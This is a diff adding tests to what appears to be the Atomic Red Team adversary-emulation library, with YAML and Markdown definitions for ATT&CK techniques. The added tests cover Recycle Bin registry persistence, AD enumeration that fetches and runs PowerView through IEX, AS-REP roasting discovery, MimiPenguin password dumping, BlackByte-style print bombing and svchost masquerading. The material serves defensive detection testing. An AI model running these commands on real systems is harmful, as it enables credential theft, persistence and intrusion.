+    atomic_tests:
+    - name: Add a driver
+      auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+      description: 'Install a driver via pnputil.exe lolbin
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        driver_inf:
+          description: A built-in, already installed windows driver inf
+          type: Path
+          default: C:\Windows\INF\usbstor.inf
+      executor:
+        command: 'pnputil.exe /add-driver "#{driver_inf}"
+
+'
+        name: command_prompt
  T1037:
    technique:
      id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
@@ -48752,6 +49078,19 @@ persistence:
          Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
        name: powershell
        elevation_required: true
+    - name: Add persistance via Recycle bin
+      auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+      description: |
+        Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+        User have to clic on the recycle bin to lauch the payload (here calc)
+      supported_platforms:
+      - windows
+      executor:
+        command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
+          /ve /d "calc.exe" /f
+        cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
+          /f
+        name: command_prompt
  T1505.001:
    technique:
      external_references:
@@ -54966,6 +55305,31 @@ discovery:
          -Server #{domain}

 '
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+      description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
+        users. Upon execution, Users within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+        name: powershell
+    - name: Enumerate Active Directory Users with ADSISearcher
+      auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+        Upon successful execution a listing of users will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
  T1069.002:
    technique:
      external_references:
@@ -55159,6 +55523,97 @@ discovery:
      executor:
        command: "#{adfind_path} -f (objectcategory=group)\n"
        name: command_prompt
+    - name: Enumerate Active Directory Groups with Get-AdGroup
+      auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+      description: |
+        The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: 'Get-AdGroup -Filter *
+
+'
+    - name: Enumerate Active Directory Groups with ADSISearcher
+      auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+
+'
+    - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+      auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+      description: |
+        When successful, accounts that do not require kerberos pre-auth will be returned.
+        Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined.
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually.
+
+'
+      - description: 'Requires the Active Directory module for powershell to be installed.
+
+'
+        prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
+          useraccountcontrol | Format-Table name
+
+'
+    - name: Get-DomainGroupMember with PowerView
+      auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+      description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
+        users. Upon execution, progress and info about groups within the domain being
+        scanned will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+        name: powershell
+    - name: Get-DomainGroup with PowerView
+      auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+      description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
+        groups. Upon execution, Groups within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+        name: powershell
  T1482:
    technique:
      external_references:
@@ -56728,6 +57183,32 @@ discovery:
      executor:
        command: pwpolicy getaccountpolicies
        name: bash
+    - name: Get-DomainPolicy with PowerView
+      auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+      description: 'Utilizing PowerView, run Get-DomainPolicy to return the default
+        domain policy or the domain controller policy for the current domain or a
+        specified domain/domain controller.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+        name: powershell
+    - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+      auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+      description: |
+        The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+        Upon successful execution a listing of the policy implemented will display.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-addefaultdomainpasswordpolicy
  T1120:
    technique:
      created: '2017-05-31T21:31:28.471Z'
@@ -56913,6 +57394,42 @@ discovery:
      executor:
        command: 'tasklist

+'
+        name: command_prompt
+    - name: Process Discovery - Get-Process
+      auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+      description: "Utilize Get-Process PowerShell cmdlet to identify processes.\n\nUpon
+        successful execution, powershell.exe will execute Get-Process to list processes.
+        Output will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Get-Process
+
+'
+        name: powershell
+    - name: Process Discovery - get-wmiObject
+      auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
+      description: "Utilize get-wmiObject PowerShell cmdlet to identify processes.\n\nUpon
+        successful execution, powershell.exe will execute get-wmiObject to list processes.
+        Output will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'get-wmiObject -class Win32_Process
+
+'
+        name: powershell
+    - name: Process Discovery - wmic process
+      auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+      description: "Utilize windows management instrumentation to identify processes.\n\nUpon
+        successful execution, WMIC will execute process to list processes. Output
+        will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'wmic process get /format:list
+
 '
        name: command_prompt
  T1012:
@@ -57400,6 +57917,60 @@ discovery:
            Write-Host $Computer}
        name: powershell
        elevation_required: false
+    - name: Enumerate Active Directory Computers with Get-AdComputer
+      auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+      description: |
+        The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+        Upon successful execution a listing of Computers will output with their paths in AD.
+        Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-AdComputer -Filter *
+
+'
+    - name: Enumerate Active Directory Computers with ADSISearcher
+      auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+        Upon successful execution a listing of computers will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+
+'
+    - name: Get-DomainController with PowerView
+      auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+      description: 'Utilizing PowerView, run Get-DomainController to identify the
+        Domain Controller. Upon execution, information about the domain controller
+        within the domain will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+        name: powershell
+    - name: Get-wmiobject to Enumerate Domain Controllers
+      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+      description: |
+        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+        Upon successful execution a listing of Systems from AD will output with their paths.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-wmiobject -class ds_computer -namespace root\directory\ldap
  T1518.001:
    technique:
      id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
@@ -66508,14 +67079,11 @@ execution:
      - description: Sample script must exist on disk at specified location (#{vbscript})
        prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
        get_prereq_command: |-
-          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
          New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-          Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
      executor:
        command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
-        cleanup_command: |-
-          Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
-          Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
+        cleanup_command: Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
        name: powershell
    - name: Encoded VBS code execution
      auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
@@ -66718,6 +67286,45 @@ execution:
        command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
          & type #{output_file}\n"
        name: command_prompt
+    - name: Simulate BlackByte Ransomware Print Bombing
+      auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+      description: "This test attempts to open a file a specified number of times
+        in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte
+        ransomware's print bombing technique, where tree.dll, which contains the ransom
+        note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_to_print:
+          description: File to be opened/printed by Wordpad.
+          type: String
+          default: "$env:temp\\T1059_003note.txt"
+        max_to_print:
+          description: The maximum number of Wordpad windows the test will open/print.
+          type: String
+          default: 75
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'File to print must exist on disk at specified location (#{file_to_print})
+
+'
+        prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'new-item #{file_to_print} -value "This file has been
+          created by T1059.003 Test 4" -Force | Out-Null
+
+'
+      executor:
+        command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
+          /p #{file_to_print}" | out-null
+
+'
+        cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
+
+'
+        name: powershell
  T1047:
    technique:
      id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
@@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin

 - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)

+- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
+

 <br/>

@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed"



+<br/>
+<br/>
+
+## Atomic Test #3 - Capture Passwords with MimiPenguin
+MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
+| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo #{MimiPenguin_Location} > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{output_file} > /dev/null
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+##### Check Prereq Commands:
+```sh
+if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+mkdir /tmp/mimipenguin
+tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+```
+##### Description: Strings must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install binutils
+```
+##### Description: Python2 must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install python2
+```
+##### Description: Libc-bin must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install libc-bin
+```
+
+
+
+
 <br/>
@@ -104,3 +104,57 @@ atomic_tests:
      grep -i "PASS" "#{output_file}"
    cleanup_command: |
      rm -f "#{output_file}"
+- name: Capture Passwords with MimiPenguin
+  auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
+  description: |
+    MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+    Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+    See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+    See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007Test3.txt
+    MimiPenguin_Location:
+      description: Path of MimiPenguin script
+      type: Path
+      default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+    prereq_command: |
+      if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+      mkdir /tmp/mimipenguin
+      tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+  - description: |
+      Strings must be installed
+    prereq_command: |
+      if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install binutils
+  - description: |
+      Python2 must be installed
+    prereq_command: |
+      if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install python2       
+  - description: |
+      Libc-bin must be installed
+    prereq_command: |
+      if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install libc-bin        
+  executor:
+    command: |
+      sudo #{MimiPenguin_Location} > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      rm -f #{output_file} > /dev/null
+    name: bash
+    elevation_required: true
@@ -36,6 +36,14 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition

 - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)

+- [Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-16---enumerate-active-directory-computers-with-get-adcomputer)
+
+- [Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-17---enumerate-active-directory-computers-with-adsisearcher)
+
+- [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)
+
+- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
+

 <br/>

@@ -634,4 +642,123 @@ write-host "This PC must be manually added to a domain."



+<br/>
+<br/>
+
+## Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer
+The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+Upon successful execution a listing of Computers will output with their paths in AD.
+Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdComputer -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+Upon successful execution a listing of computers will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #18 - Get-DomainController with PowerView
+Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+Upon successful execution a listing of Systems from AD will output with their paths.
+Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiobject -class ds_computer -namespace root\directory\ldap
+```
+
+
+
+
+
+
 <br/>
@@ -310,3 +310,53 @@ atomic_tests:
        Write-Host $Computer}
    name: powershell
    elevation_required: false
+- name: Enumerate Active Directory Computers with Get-AdComputer
+  auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+  description: |
+    The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+    Upon successful execution a listing of Computers will output with their paths in AD.
+    Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-AdComputer -Filter *
+- name: Enumerate Active Directory Computers with ADSISearcher
+  auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+    Upon successful execution a listing of computers will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+- name: Get-DomainController with PowerView
+  auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+  description: |
+    Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+    name: powershell
+- name: Get-wmiobject to Enumerate Domain Controllers
+  auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+  description: |
+    The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+    Upon successful execution a listing of Systems from AD will output with their paths.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-wmiobject -class ds_computer -namespace root\directory\ldap
@@ -8,6 +8,8 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl

 - [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)

+- [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)
+

 <br/>

@@ -48,4 +50,49 @@ rmdir $HOME/.../



+<br/>
+<br/>
+
+## Atomic Test #2 - Masquerade as a built-in system executable
+Launch an executable that attempts to masquerade as a legitimate executable.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | String | $Env:windir&#92;Temp&#92;svchost.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Add-Type -TypeDefinition @'
+public class Test {
+    public static void Main(string[] args) {
+        System.Console.WriteLine("tweet, tweet");
+    }
+}
+'@ -OutputAssembly "#{executable_filepath}"
+
+Start-Process -FilePath "#{executable_filepath}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
@@ -1,23 +1,18 @@
---
 attack_technique: T1036.005
 display_name: 'Masquerading: Match Legitimate Name or Location'
-
 atomic_tests:
 - name: Execute a process from a directory masquerading as the current parent directory.
  auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
  description: |
    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
-
  supported_platforms:
    - macos
    - linux
-
  input_arguments:
    test_message:
      description: Test message to echo out to the screen
      type: String
      default: Hello from the Atomic Red Team test T1036.005#1
-
  executor:
    name: sh
    elevation_required: false
@@ -28,3 +23,28 @@ atomic_tests:
    cleanup_command: |
      rm -f $HOME/.../sh
      rmdir $HOME/.../
+- name: Masquerade as a built-in system executable
+  auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+  description: |
+    Launch an executable that attempts to masquerade as a legitimate executable.
+  supported_platforms:
+  - windows
+  input_arguments:
+    executable_filepath:
+      description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
+      type: String
+      default: $Env:windir\Temp\svchost.exe
+  executor:
+    command: |
+      Add-Type -TypeDefinition @'
+      public class Test {
+          public static void Main(string[] args) {
+              System.Console.WriteLine("tweet, tweet");
+          }
+      }
+      '@ -OutputAssembly "#{executable_filepath}"
+      
+      Start-Process -FilePath "#{executable_filepath}"
+    cleanup_command: |
+      Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+    name: powershell
@@ -10,6 +10,12 @@ In Windows environments, adversaries could obtain details on running processes u

 - [Atomic Test #2 - Process Discovery - tasklist](#atomic-test-2---process-discovery---tasklist)

+- [Atomic Test #3 - Process Discovery - Get-Process](#atomic-test-3---process-discovery---get-process)
+
+- [Atomic Test #4 - Process Discovery - get-wmiObject](#atomic-test-4---process-discovery---get-wmiobject)
+
+- [Atomic Test #5 - Process Discovery - wmic process](#atomic-test-5---process-discovery---wmic-process)
+

 <br/>

@@ -80,4 +86,94 @@ tasklist



+<br/>
+<br/>
+
+## Atomic Test #3 - Process Discovery - Get-Process
+Utilize Get-Process PowerShell cmdlet to identify processes.
+
+Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-Process
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Process Discovery - get-wmiObject
+Utilize get-wmiObject PowerShell cmdlet to identify processes.
+
+Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b51239b4-0129-474f-a2b4-70f855b9f2c2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiObject -class Win32_Process
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Process Discovery - wmic process
+Utilize windows management instrumentation to identify processes.
+
+Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wmic process get /format:list
+```
+
+
+
+
+
+
 <br/>
@@ -34,4 +34,39 @@ atomic_tests:
    command: |
      tasklist
    name: command_prompt
+- name: Process Discovery - Get-Process
+  auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+  description: |
+    Utilize Get-Process PowerShell cmdlet to identify processes.

+    Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
